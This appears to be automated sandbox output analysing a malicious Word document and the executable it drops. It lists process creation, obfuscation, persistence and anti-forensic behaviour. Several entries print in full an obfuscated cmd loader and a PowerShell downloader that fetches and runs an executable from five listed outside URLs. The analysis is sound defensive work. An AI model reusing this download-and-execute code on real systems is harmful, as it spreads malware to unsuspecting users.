Source: unknownProcess created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Source: unknownProcess created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\968.exeProcess created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exeJump to behavior
Source: C:\Windows\SysWOW64\startedradar.exeProcess created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: PAY3646944800277778.docStream path 'VBA/cazz' : High number of string operations
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B1A36 LoadLibraryA,GetProcAddress,12_2_004B1A36
PE file contains an invalid checksumShow sources
Source: 968.exe.11.drStatic PE information: real checksum: 0x930e0ac3 should be: 0x2f63e
PE file contains sections with non-standard namesShow sources
Source: 968.exe.11.drStatic PE information: section name: .crt3
Source: 968.exe.11.drStatic PE information: section name: .code
Source: 968.exe.11.drStatic PE information: section name: .crt1
Source: 968.exe.11.drStatic PE information: section name: .x
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040E047 pushfd ; retf 12_2_0040E04B
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040BC1B push edx; ret 12_2_0040BC1D
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040D2EF pushfd ; retf 12_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040D884 push ecx; ret 12_2_0040D88B
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040C2BF push eax; ret 12_2_0040C2C0
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040D313 pushfd ; retf 12_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040D7CD push edx; ret 12_2_0040D7D0
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_0040D3B1 push edx; rep ret 12_2_0040D3B2
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004BBD22 push edi; retf 12_2_004BBD25
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040E047 pushfd ; retf 15_2_0040E04B
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040BC1B push edx; ret 15_2_0040BC1D
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040D2EF pushfd ; retf 15_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040D884 push ecx; ret 15_2_0040D88B
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040C2BF push eax; ret 15_2_0040C2C0
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040D313 pushfd ; retf 15_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040D7CD push edx; ret 15_2_0040D7D0
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 15_2_0040D3B1 push edx; rep ret 15_2_0040D3B2
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040E047 pushfd ; retf 16_2_0040E04B
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040BC1B push edx; ret 16_2_0040BC1D
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040D2EF pushfd ; retf 16_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040D884 push ecx; ret 16_2_0040D88B
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040C2BF push eax; ret 16_2_0040C2C0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040D313 pushfd ; retf 16_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040D7CD push edx; ret 16_2_0040D7D0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 16_2_0040D3B1 push edx; rep ret 16_2_0040D3B2
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040E047 pushfd ; retf 17_2_0040E04B
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040BC1B push edx; ret 17_2_0040BC1D
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040D2EF pushfd ; retf 17_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040D884 push ecx; ret 17_2_0040D88B
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040C2BF push eax; ret 17_2_0040C2C0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_0040D313 pushfd ; retf 17_2_0040D2FF

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\startedradar.exeExecutable created and started: C:\Windows\SysWOW64\startedradar.exe
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';Jump to behavior
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\968.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exePE file moved: C:\Windows\SysWOW64\startedradar.exeJump to behavior

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7FE71 StartServiceW,CloseServiceHandle,CloseServiceHandle,17_2_00E7FE71

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exeFile opened: C:\Windows\SysWOW64\startedradar.exe:Zone.Identifier read attributes | deleteJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
